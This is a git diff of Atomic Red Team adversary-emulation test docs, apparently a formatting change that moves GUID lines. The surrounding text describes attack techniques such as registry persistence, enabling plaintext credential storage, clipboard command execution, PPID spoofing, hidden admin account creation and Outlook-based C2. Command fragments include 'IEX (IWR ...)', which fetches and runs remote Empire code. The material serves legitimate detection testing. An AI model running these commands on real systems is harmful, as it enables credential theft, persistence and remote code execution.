## Atomic Test #2 - Modify Registry of Local Machine - cmd - -auto_generated_guid: 282f929a-6bc5-42b8-bd93-960c3ba35afe - Modify the Local Machine registry RUN key to change Windows Defender executable that should be ran on startup. This should only be possible when CMD is ran as Administrative rights. Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU\Software\Microsoft\Windows\CurrentVersion\Run. + **Supported Platforms:** Windows +**auto_generated_guid:** 282f929a-6bc5-42b8-bd93-960c3ba35afe + + + #### Inputs: @@ -94,15 +98,17 @@ reg delete HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v S
## Atomic Test #3 - Modify registry to store logon credentials - -auto_generated_guid: c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 - Sets registry key that will tell windows to store plaintext passwords (making the system vulnerable to clear text / cleartext password dumping). Upon execution, the message "The operation completed successfully." will be displayed. Additionally, open Registry Editor to view the modified entry in HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest. + **Supported Platforms:** Windows +**auto_generated_guid:** c0413fb5-33e2-40b7-9b6f-60b29f4a7a18 + + + @@ -126,17 +132,19 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
## Atomic Test #4 - Add domain to Trusted sites Zone - -auto_generated_guid: cf447677-5a4e-4937-a82c-e47d254afd57 - Attackers may add a domain to the trusted site zone to bypass defenses. Doing this enables attacks such as c2 over office365. Upon execution, details of the new registry entries will be displayed. Additionally, open Registry Editor to view the modified entry in HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\. https://www.blackhat.com/docs/us-17/wednesday/us-17-Dods-Infecting-The-Enterprise-Abusing-Office365-Powershell-For-Covert-C2.pdf + **Supported Platforms:** Windows +**auto_generated_guid:** cf447677-5a4e-4937-a82c-e47d254afd57 + + + #### Inputs: @@ -171,14 +179,16 @@ Remove-item $key -Recurse -ErrorAction Ignore
## Atomic Test #5 - Javascript in registry - -auto_generated_guid: 15f44ea9-4571-4837-be9e-802431a7bfae - Upon execution, a javascript block will be placed in the registry for persistence. Additionally, open Registry Editor to view the modified entry in HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings. + **Supported Platforms:** Windows +**auto_generated_guid:** 15f44ea9-4571-4837-be9e-802431a7bfae + + + @@ -202,14 +212,16 @@ Remove-ItemProperty "HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Se
## Atomic Test #6 - Change Powershell Execution Policy to Bypass - -auto_generated_guid: f3a6cceb-06c9-48e5-8df8-8867a6814245 - Attackers need to change the powershell execution policy in order to run their malicious powershell scripts. They can either specify it during the execution of the powershell script or change the registry value for it. + **Supported Platforms:** Windows +**auto_generated_guid:** f3a6cceb-06c9-48e5-8df8-8867a6814245 + + + #### Inputs: diff --git a/atomics/T1113/T1113.md b/atomics/T1113/T1113.md index a2cd69a4..fc466d2d 100644 --- a/atomics/T1113/T1113.md +++ b/atomics/T1113/T1113.md @@ -19,13 +19,15 @@
## Atomic Test #1 - Screencapture - -auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac - Use screencapture command to collect a full desktop screenshot + **Supported Platforms:** macOS +**auto_generated_guid:** 0f47ceb1-720f-4275-96b8-21f0562217ac + + + #### Inputs: @@ -54,13 +56,15 @@ rm #{output_file}
## Atomic Test #2 - Screencapture (silent) - -auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 - Use screencapture command to collect a full desktop screenshot + **Supported Platforms:** macOS +**auto_generated_guid:** deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 + + + #### Inputs: @@ -89,13 +93,15 @@ rm #{output_file}
## Atomic Test #3 - X Windows Capture - -auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac - Use xwd command to collect a full desktop screenshot and review file with xwud + **Supported Platforms:** Linux +**auto_generated_guid:** 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac + + + #### Inputs: @@ -139,13 +145,15 @@ sudo #{package_installer}
## Atomic Test #4 - Capture Linux Desktop using Import Tool - -auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 - Use import command from ImageMagick to collect a full desktop screenshot + **Supported Platforms:** Linux +**auto_generated_guid:** 9cd1cccb-91e4-4550-9139-e20a586fcea1 + + + #### Inputs: @@ -186,13 +194,15 @@ sudo apt-get -y install graphicsmagick-imagemagick-compat
## Atomic Test #5 - Windows Screencapture - -auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 - Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour + **Supported Platforms:** Windows +**auto_generated_guid:** 3c898f62-626c-47d5-aad2-6de873d69153 + + + #### Inputs: diff --git a/atomics/T1114.001/T1114.001.md b/atomics/T1114.001/T1114.001.md index 55f5e0c4..e641d3bc 100644 --- a/atomics/T1114.001/T1114.001.md +++ b/atomics/T1114.001/T1114.001.md @@ -12,16 +12,18 @@ Outlook stores data locally in offline data files with an extension of .ost. Out
## Atomic Test #1 - Email Collection with PowerShell Get-Inbox - -auto_generated_guid: 3f1b5096-0139-4736-9b78-19bcb02bb1cb - Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration. Successful execution will produce stdout message stating "Please be patient, this may take some time...". Upon completion, final output will be a mail.csv file. Note: Outlook is required, but no email account necessary to produce artifacts. + **Supported Platforms:** Windows +**auto_generated_guid:** 3f1b5096-0139-4736-9b78-19bcb02bb1cb + + + #### Inputs: diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md index 4967809c..447bfa64 100644 --- a/atomics/T1115/T1115.md +++ b/atomics/T1115/T1115.md @@ -18,13 +18,15 @@ In Windows, Applications can access clipboard data by using the Windows API.(Cit
## Atomic Test #1 - Utilize Clipboard to store or execute commands from - -auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 - Add data to clipboard to copy off or execute commands from. + **Supported Platforms:** Windows +**auto_generated_guid:** 0cd14633-58d4-4422-9ede-daa2c9474ae7 + + + @@ -50,13 +52,15 @@ del %temp%\T1115.txt >nul 2>&1
## Atomic Test #2 - Execute Commands from Clipboard using PowerShell - -auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 - Utilize PowerShell to echo a command to clipboard and execute it + **Supported Platforms:** Windows +**auto_generated_guid:** d6dc21af-bec9-4152-be86-326b6babd416 + + + @@ -77,13 +81,15 @@ Get-Clipboard | iex
## Atomic Test #3 - Execute commands from clipboard - -auto_generated_guid: 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff - Echo a command to clipboard and execute it + **Supported Platforms:** macOS +**auto_generated_guid:** 1ac2247f-65f8-4051-b51f-b0ccdfaaa5ff + + + @@ -104,13 +110,15 @@ $(pbpaste)
## Atomic Test #4 - Collect Clipboard Data via VBA - -auto_generated_guid: 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 - This module copies the data stored in the user's clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt + **Supported Platforms:** Windows +**auto_generated_guid:** 9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52 + + + #### Inputs: diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md index 90f0a4d8..f85f5632 100644 --- a/atomics/T1119/T1119.md +++ b/atomics/T1119/T1119.md @@ -18,14 +18,16 @@ This technique may incorporate use of other techniques such as [File and Directo
## Atomic Test #1 - Automated Collection Command Prompt - -auto_generated_guid: cb379146-53f1-43e0-b884-7ce2c635ff5b - Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_command_prompt_collection to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** cb379146-53f1-43e0-b884-7ce2c635ff5b + + + @@ -51,14 +53,16 @@ del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
## Atomic Test #2 - Automated Collection PowerShell - -auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 - Automated Collection. Upon execution, check the users temp directory (%temp%) for the folder T1119_powershell_collection to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** 634bd9b9-dc83-4229-b19f-7f83ba9ad313 + + + @@ -83,14 +87,16 @@ Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | O
## Atomic Test #3 - Recon information for export with PowerShell - -auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 - collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** c3f6d794-50dd-482f-b640-0384fbb7db26 + + + @@ -118,14 +124,16 @@ Remove-Item $env:TEMP\T1119_3.txt -ErrorAction Ignore
## Atomic Test #4 - Recon information for export with Command Prompt - -auto_generated_guid: aa1180e2-f329-4e1e-8625-2472ec0bfaf3 - collect information for exfiltration. Upon execution, check the users temp directory (%temp%) for files T1119_*.txt to see what was collected. + **Supported Platforms:** Windows +**auto_generated_guid:** aa1180e2-f329-4e1e-8625-2472ec0bfaf3 + + + diff --git a/atomics/T1120/T1120.md b/atomics/T1120/T1120.md index a1d5580a..18669e5e 100644 --- a/atomics/T1120/T1120.md +++ b/atomics/T1120/T1120.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Win32_PnPEntity Hardware Inventory - -auto_generated_guid: 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 - Perform peripheral device discovery using Get-WMIObject Win32_PnPEntity + **Supported Platforms:** Windows +**auto_generated_guid:** 2cb4dbf2-2dca-4597-8678-4d39d207a3a5 + + + diff --git a/atomics/T1123/T1123.md b/atomics/T1123/T1123.md index ea593f6a..4c71401f 100644 --- a/atomics/T1123/T1123.md +++ b/atomics/T1123/T1123.md @@ -12,13 +12,15 @@ Malware or scripts may be used to interact with the devices through an available
## Atomic Test #1 - using device audio capture commandlet - -auto_generated_guid: 9c3ad250-b185-4444-b5a9-d69218a10c95 - [AudioDeviceCmdlets](https://github.com/cdhunt/WindowsAudioDevice-Powershell-Cmdlet) + **Supported Platforms:** Windows +**auto_generated_guid:** 9c3ad250-b185-4444-b5a9-d69218a10c95 + + + diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md index 13cc9567..6c47ab1a 100644 --- a/atomics/T1124/T1124.md +++ b/atomics/T1124/T1124.md @@ -16,13 +16,15 @@ This information could be useful for performing other techniques, such as execut
## Atomic Test #1 - System Time Discovery - -auto_generated_guid: 20aba24b-e61f-4b26-b4ce-4784f763ca20 - Identify the system time. Upon execution, the local computer system time and timezone will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 20aba24b-e61f-4b26-b4ce-4784f763ca20 + + + #### Inputs: @@ -48,13 +50,15 @@ w32tm /tz
## Atomic Test #2 - System Time Discovery - PowerShell - -auto_generated_guid: 1d5711d6-655c-4a47-ae9c-6503c74fa877 - Identify the system time via PowerShell. Upon execution, the system time will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 1d5711d6-655c-4a47-ae9c-6503c74fa877 + + + diff --git a/atomics/T1127.001/T1127.001.md b/atomics/T1127.001/T1127.001.md index 750799b6..5175ec9f 100644 --- a/atomics/T1127.001/T1127.001.md +++ b/atomics/T1127.001/T1127.001.md @@ -14,13 +14,15 @@ Adversaries can abuse MSBuild to proxy execution of malicious code. The inline t
## Atomic Test #1 - MSBuild Bypass Using Inline Tasks (C#) - -auto_generated_guid: 58742c0f-cb01-44cd-a60b-fb26e8871c93 - Executes the code in a project file using msbuild.exe. The default C# project example file (T1127.001.csproj) will simply print "Hello From a Code Fragment" and "Hello From a Class." to the screen. + **Supported Platforms:** Windows +**auto_generated_guid:** 58742c0f-cb01-44cd-a60b-fb26e8871c93 + + + #### Inputs: @@ -60,13 +62,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - MSBuild Bypass Using Inline Tasks (VB) - -auto_generated_guid: ab042179-c0c5-402f-9bc8-42741f5ce359 - Executes the code in a project file using msbuild.exe. The default Visual Basic example file (vb.xml) will simply print "Hello from a Visual Basic inline task!" to the screen. + **Supported Platforms:** Windows +**auto_generated_guid:** ab042179-c0c5-402f-9bc8-42741f5ce359 + + + #### Inputs: diff --git a/atomics/T1132.001/T1132.001.md b/atomics/T1132.001/T1132.001.md index d0c7e284..f3c396c8 100644 --- a/atomics/T1132.001/T1132.001.md +++ b/atomics/T1132.001/T1132.001.md @@ -10,13 +10,15 @@
## Atomic Test #1 - Base64 Encoded data. - -auto_generated_guid: 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 - Utilizing a common technique for posting base64 encoded data. + **Supported Platforms:** macOS, Linux +**auto_generated_guid:** 1164f70f-9a88-4dff-b9ff-dc70e7bf0c25 + + + #### Inputs: diff --git a/atomics/T1133/T1133.md b/atomics/T1133/T1133.md index 8129da91..24b4ad2b 100644 --- a/atomics/T1133/T1133.md +++ b/atomics/T1133/T1133.md @@ -14,13 +14,15 @@ Access may also be gained through an exposed service that doesn’t require auth
## Atomic Test #1 - Running Chrome VPN Extensions via the Registry 2 vpn extension - -auto_generated_guid: 4c8db261-a58b-42a6-a866-0a294deedde4 - Running Chrome VPN Extensions via the Registry install 2 vpn extension, please see "T1133\src\list of vpn extension.txt" to view complete list + **Supported Platforms:** Windows +**auto_generated_guid:** 4c8db261-a58b-42a6-a866-0a294deedde4 + + + #### Inputs: diff --git a/atomics/T1134.001/T1134.001.md b/atomics/T1134.001/T1134.001.md index 1a8ba916..958ceb8c 100644 --- a/atomics/T1134.001/T1134.001.md +++ b/atomics/T1134.001/T1134.001.md @@ -14,16 +14,18 @@ An adversary may do this when they have a specific, existing process they want t
## Atomic Test #1 - Named pipe client impersonation - -auto_generated_guid: 90db9e27-8e7c-4c04-b602-a45927884966 - Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/ + **Supported Platforms:** Windows +**auto_generated_guid:** 90db9e27-8e7c-4c04-b602-a45927884966 + + + @@ -44,14 +46,16 @@ IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f
## Atomic Test #2 - `SeDebugPrivilege` token duplication - -auto_generated_guid: 34f0a430-9d04-4d98-bcb5-1989f14719f0 - Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). + **Supported Platforms:** Windows +**auto_generated_guid:** 34f0a430-9d04-4d98-bcb5-1989f14719f0 + + + diff --git a/atomics/T1134.004/T1134.004.md b/atomics/T1134.004/T1134.004.md index 93157b9e..c2fa3995 100644 --- a/atomics/T1134.004/T1134.004.md +++ b/atomics/T1134.004/T1134.004.md @@ -22,17 +22,19 @@ Explicitly assigning the PPID may also enable elevated privileges given appropri
## Atomic Test #1 - Parent PID Spoofing using PowerShell - -auto_generated_guid: 069258f4-2162-46e9-9a25-c9c6c56150d2 - This test uses PowerShell to replicates how Cobalt Strike does ppid spoofing and masquerade a spawned process. Upon execution, "Process C:\Program Files\Internet Explorer\iexplore.exe is spawned with pid ####" will be displayed and calc.exe will be launched. Credit to In Ming Loh (https://github.com/countercept/ppid-spoofing/blob/master/PPID-Spoof.ps1) + **Supported Platforms:** Windows +**auto_generated_guid:** 069258f4-2162-46e9-9a25-c9c6c56150d2 + + + #### Inputs: @@ -81,13 +83,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Parent PID Spoofing - Spawn from Current Process - -auto_generated_guid: 14920ebd-1d61-491a-85e0-fe98efe37f25 - Spawns a powershell.exe process as a child of the current process. + **Supported Platforms:** Windows +**auto_generated_guid:** 14920ebd-1d61-491a-85e0-fe98efe37f25 + + + #### Inputs: @@ -128,13 +132,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #3 - Parent PID Spoofing - Spawn from Specified Process - -auto_generated_guid: cbbff285-9051-444a-9d17-c07cd2d230eb - Spawns a notepad.exe process as a child of the current process. + **Supported Platforms:** Windows +**auto_generated_guid:** cbbff285-9051-444a-9d17-c07cd2d230eb + + + #### Inputs: @@ -174,13 +180,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #4 - Parent PID Spoofing - Spawn from svchost.exe - -auto_generated_guid: e9f2b777-3123-430b-805d-5cedc66ab591 - Spawnd a process as a child of the first accessible svchost.exe process. + **Supported Platforms:** Windows +**auto_generated_guid:** e9f2b777-3123-430b-805d-5cedc66ab591 + + + #### Inputs: @@ -220,13 +228,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Parent PID Spoofing - Spawn from New Process - -auto_generated_guid: 2988133e-561c-4e42-a15f-6281e6a9b2db - Creates a notepad.exe process and then spawns a powershell.exe process as a child of it. + **Supported Platforms:** Windows +**auto_generated_guid:** 2988133e-561c-4e42-a15f-6281e6a9b2db + + + #### Inputs: diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md index 1bd8f520..a45e078c 100644 --- a/atomics/T1135/T1135.md +++ b/atomics/T1135/T1135.md @@ -22,13 +22,15 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik
## Atomic Test #1 - Network Share Discovery - -auto_generated_guid: f94b5ad9-911c-4eff-9718-fd21899db4f7 - Network Share Discovery + **Supported Platforms:** macOS +**auto_generated_guid:** f94b5ad9-911c-4eff-9718-fd21899db4f7 + + + #### Inputs: @@ -55,13 +57,15 @@ showmount #{computer_name}
## Atomic Test #2 - Network Share Discovery - linux - -auto_generated_guid: 875805bc-9e86-4e87-be86-3a5527315cae - Network Share Discovery using smbstatus + **Supported Platforms:** Linux +**auto_generated_guid:** 875805bc-9e86-4e87-be86-3a5527315cae + + + #### Inputs: @@ -99,14 +103,16 @@ sudo #{package_installer}
## Atomic Test #3 - Network Share Discovery command prompt - -auto_generated_guid: 20f1097d-81c1-405c-8380-32174d493bbb - Network Share Discovery utilizing the command prompt. The computer name variable may need to be modified to point to a different host Upon execution avalaible network shares will be displayed in the powershell session + **Supported Platforms:** Windows +**auto_generated_guid:** 20f1097d-81c1-405c-8380-32174d493bbb + + + #### Inputs: @@ -131,14 +137,16 @@ net view \\#{computer_name}
## Atomic Test #4 - Network Share Discovery PowerShell - -auto_generated_guid: 1b0814d1-bb24-402d-9615-1b20c50733fb - Network Share Discovery utilizing PowerShell. The computer name variable may need to be modified to point to a different host Upon execution, avalaible network shares will be displayed in the powershell session + **Supported Platforms:** Windows +**auto_generated_guid:** 1b0814d1-bb24-402d-9615-1b20c50733fb + + + @@ -158,13 +166,15 @@ get-smbshare
## Atomic Test #5 - View available share drives - -auto_generated_guid: ab39a04f-0c93-4540-9ff2-83f862c385ae - View information about all of the resources that are shared on the local computer Upon execution, avalaible share drives will be displayed in the powershell session + **Supported Platforms:** Windows +**auto_generated_guid:** ab39a04f-0c93-4540-9ff2-83f862c385ae + + + @@ -184,13 +194,15 @@ net share
## Atomic Test #6 - Share Discovery with PowerView - -auto_generated_guid: b1636f0a-ba82-435c-b699-0d78794d8bfd - Enumerate Domain Shares the current user has access. Upon execution, progress info about each share being scanned will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** b1636f0a-ba82-435c-b699-0d78794d8bfd + + + diff --git a/atomics/T1136.001/T1136.001.md b/atomics/T1136.001/T1136.001.md index 5a814eb8..de0dfdfd 100644 --- a/atomics/T1136.001/T1136.001.md +++ b/atomics/T1136.001/T1136.001.md @@ -22,13 +22,15 @@ Such accounts may be used to establish secondary credentialed access that do not
## Atomic Test #1 - Create a user account on a Linux system - -auto_generated_guid: 40d8eabd-e394-46f6-8785-b9bfa1d011d2 - Create a user via useradd + **Supported Platforms:** Linux +**auto_generated_guid:** 40d8eabd-e394-46f6-8785-b9bfa1d011d2 + + + #### Inputs: @@ -57,13 +59,15 @@ userdel #{username}
## Atomic Test #2 - Create a user account on a MacOS system - -auto_generated_guid: 01993ba5-1da3-4e15-a719-b690d4f0f0b2 - Creates a user on a MacOS system with dscl + **Supported Platforms:** macOS +**auto_generated_guid:** 01993ba5-1da3-4e15-a719-b690d4f0f0b2 + + + #### Inputs: @@ -98,14 +102,16 @@ dscl . -delete /Users/#{username}
## Atomic Test #3 - Create a new user in a command prompt - -auto_generated_guid: 6657864e-0323-4206-9344-ac9cd7265a4f - Creates a new user in a command prompt. Upon execution, "The command completed successfully." will be displayed. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_CMD" + **Supported Platforms:** Windows +**auto_generated_guid:** 6657864e-0323-4206-9344-ac9cd7265a4f + + + #### Inputs: @@ -135,14 +141,16 @@ net user /del "#{username}" >nul 2>&1
## Atomic Test #4 - Create a new user in PowerShell - -auto_generated_guid: bc8be0ac-475c-4fbf-9b1d-9fffd77afbde - Creates a new user in PowerShell. Upon execution, details about the new account will be displayed in the powershell session. To verify the new account, run "net user" in powershell or CMD and observe that there is a new user named "T1136.001_PowerShell" + **Supported Platforms:** Windows +**auto_generated_guid:** bc8be0ac-475c-4fbf-9b1d-9fffd77afbde + + + #### Inputs: @@ -171,13 +179,15 @@ Remove-LocalUser -Name "#{username}" -ErrorAction Ignore
## Atomic Test #5 - Create a new user in Linux with `root` UID and GID. - -auto_generated_guid: a1040a30-d28b-4eda-bd99-bb2861a4616c - Creates a new user in Linux and adds the user to the `root` group. This technique was used by adversaries during the Butter attack campaign. + **Supported Platforms:** Linux +**auto_generated_guid:** a1040a30-d28b-4eda-bd99-bb2861a4616c + + + #### Inputs: @@ -208,13 +218,15 @@ userdel #{username}
## Atomic Test #6 - Create a new Windows admin user - -auto_generated_guid: fda74566-a604-4581-a4cc-fbbe21d66559 - Creates a new admin user in a command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** fda74566-a604-4581-a4cc-fbbe21d66559 + + + #### Inputs: diff --git a/atomics/T1136.002/T1136.002.md b/atomics/T1136.002/T1136.002.md index 698235a2..7ab024da 100644 --- a/atomics/T1136.002/T1136.002.md +++ b/atomics/T1136.002/T1136.002.md @@ -16,13 +16,15 @@ Such accounts may be used to establish secondary credentialed access that do not
## Atomic Test #1 - Create a new Windows domain admin user - -auto_generated_guid: fcec2963-9951-4173-9bfa-98d8b7834e62 - Creates a new domain admin user in a command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** fcec2963-9951-4173-9bfa-98d8b7834e62 + + + #### Inputs: @@ -54,13 +56,15 @@ net user "#{username}" >nul 2>&1 /del /domain
## Atomic Test #2 - Create a new account similar to ANONYMOUS LOGON - -auto_generated_guid: dc7726d2-8ccb-4cc6-af22-0d5afb53a548 - Create a new account similar to ANONYMOUS LOGON in a command prompt. + **Supported Platforms:** Windows +**auto_generated_guid:** dc7726d2-8ccb-4cc6-af22-0d5afb53a548 + + + #### Inputs: @@ -90,13 +94,15 @@ net user "#{username}" >nul 2>&1 /del /domain
## Atomic Test #3 - Create a new Domain Account using PowerShell - -auto_generated_guid: 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 - Creates a new Domain User using the credentials of the Current User + **Supported Platforms:** Windows +**auto_generated_guid:** 5a3497a4-1568-4663-b12a-d4a5ed70c7d7 + + + #### Inputs: diff --git a/atomics/T1137.002/T1137.002.md b/atomics/T1137.002/T1137.002.md index 1fee5136..630447b7 100644 --- a/atomics/T1137.002/T1137.002.md +++ b/atomics/T1137.002/T1137.002.md @@ -17,14 +17,16 @@ Adversaries may add this Registry key and specify a malicious DLL that will be e
## Atomic Test #1 - Office Application Startup Test Persistence - -auto_generated_guid: c3e35b58-fe1c-480b-b540-7600fb612563 - Office Test Registry location exists that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started. Key is used for debugging purposes. Not created by default & exist in HKCU & HKLM hives. + **Supported Platforms:** Windows +**auto_generated_guid:** c3e35b58-fe1c-480b-b540-7600fb612563 + + + #### Inputs: diff --git a/atomics/T1137.004/T1137.004.md b/atomics/T1137.004/T1137.004.md index c7058537..28762842 100644 --- a/atomics/T1137.004/T1137.004.md +++ b/atomics/T1137.004/T1137.004.md @@ -13,15 +13,17 @@ Once malicious home pages have been added to the user’s mailbox, they will be
## Atomic Test #1 - Install Outlook Home Page Persistence - -auto_generated_guid: 7a91ad51-e6d2-4d43-9471-f26362f5738e - This test simulates persistence being added to a host via the Outlook Home Page functionality. This causes Outlook to retrieve URL containing a malicious payload every time the targeted folder is viewed. Triggering the payload requires manually opening Outlook and viewing the targetted folder (e.g. Inbox). + **Supported Platforms:** Windows +**auto_generated_guid:** 7a91ad51-e6d2-4d43-9471-f26362f5738e + + + #### Inputs: diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md index b8b4f65b..b765083c 100644 --- a/atomics/T1137/T1137.md +++ b/atomics/T1137/T1137.md @@ -12,17 +12,19 @@ A variety of features have been discovered in Outlook that can be abused to obta
## Atomic Test #1 - Office Application Startup - Outlook as a C2 - -auto_generated_guid: bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c - As outlined in MDSEC's Blog post https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/ it is possible to use Outlook Macro as a way to achieve persistance and execute arbitrary commands. This transform Outlook into a C2. Too achieve this two things must happened on the syste - The macro security registry value must be set to '4' - A file called VbaProject.OTM must be created in the Outlook Folder. + **Supported Platforms:** Windows +**auto_generated_guid:** bfe6ac15-c50b-4c4f-a186-0fc6b8ba936c + + + diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md index fc670d0d..c4b0d4ed 100644 --- a/atomics/T1140/T1140.md +++ b/atomics/T1140/T1140.md @@ -16,14 +16,16 @@ Sometimes a user's action may be required to open it for deobfuscation or decryp
## Atomic Test #1 - Deobfuscate/Decode Files Or Information - -auto_generated_guid: dc6fe391-69e6-4506-bd06-ea5eeb4082f8 - Encode/Decode executable Upon execution a file named T1140_calc_decoded.exe will be placed in the temp folder + **Supported Platforms:** Windows +**auto_generated_guid:** dc6fe391-69e6-4506-bd06-ea5eeb4082f8 + + + #### Inputs: @@ -54,13 +56,15 @@ del %temp%\T1140_calc_decoded.exe >nul 2>&1
## Atomic Test #2 - Certutil Rename and Decode - -auto_generated_guid: 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 - Rename certutil and decode a file. This is in reference to latest research by FireEye [here](https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) + **Supported Platforms:** Windows +**auto_generated_guid:** 71abc534-3c05-4d0c-80f7-cbe93cb2aa94 + + + #### Inputs: diff --git a/atomics/T1176/T1176.md b/atomics/T1176/T1176.md index a5a461b2..4cc5ff74 100644 --- a/atomics/T1176/T1176.md +++ b/atomics/T1176/T1176.md @@ -24,13 +24,15 @@ There have also been instances of botnets using a persistent backdoor through ma
## Atomic Test #1 - Chrome (Developer Mode) - -auto_generated_guid: 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 - Turn on Chrome developer mode and Load Extension found in the src directory + **Supported Platforms:** Linux, Windows, macOS +**auto_generated_guid:** 3ecd790d-2617-4abf-9a8c-4e8d47da9ee1 + + + #### Run it with these steps! @@ -52,13 +54,15 @@ tick 'Developer Mode'.
## Atomic Test #2 - Chrome (Chrome Web Store) - -auto_generated_guid: 4c83940d-8ca5-4bb2-8100-f46dc914bc3f - Install the "Minimum Viable Malicious Extension" Chrome extension + **Supported Platforms:** Linux, Windows, macOS +**auto_generated_guid:** 4c83940d-8ca5-4bb2-8100-f46dc914bc3f + + + #### Run it with these steps! @@ -77,13 +81,15 @@ in Chrome
## Atomic Test #3 - Firefox - -auto_generated_guid: cb790029-17e6-4c43-b96f-002ce5f10938 - Create a file called test.wma, with the duration of 30 seconds + **Supported Platforms:** Linux, Windows, macOS +**auto_generated_guid:** cb790029-17e6-4c43-b96f-002ce5f10938 + + + #### Run it with these steps! @@ -104,13 +110,15 @@ click "Load Temporary Add-on"
## Atomic Test #4 - Edge Chromium Addon - VPN - -auto_generated_guid: 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 - Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store. + **Supported Platforms:** Windows, macOS +**auto_generated_guid:** 3d456e2b-a7db-4af8-b5b3-720e7c4d9da5 + + + #### Run it with these steps! diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index 55789fa2..f5068754 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -22,14 +22,16 @@ BITS upload functionalities can also be used to perform [Exfiltration Over Alter
## Atomic Test #1 - Bitsadmin Download (cmd) - -auto_generated_guid: 3c73d728-75fb-4180-a12f-6712864d7421 - This test simulates an adversary leveraging bitsadmin.exe to download and execute a payload + **Supported Platforms:** Windows +**auto_generated_guid:** 3c73d728-75fb-4180-a12f-6712864d7421 + + + #### Inputs: @@ -59,16 +61,18 @@ del #{local_file} >nul 2>&1
